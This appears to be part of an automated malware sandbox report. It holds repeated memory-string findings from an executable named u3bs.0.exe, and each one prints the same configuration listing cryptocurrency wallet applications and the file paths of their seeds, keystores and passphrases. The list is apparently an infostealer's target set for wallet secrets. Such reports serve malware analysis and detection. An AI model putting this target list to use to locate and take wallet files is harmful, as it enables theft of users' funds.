Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local 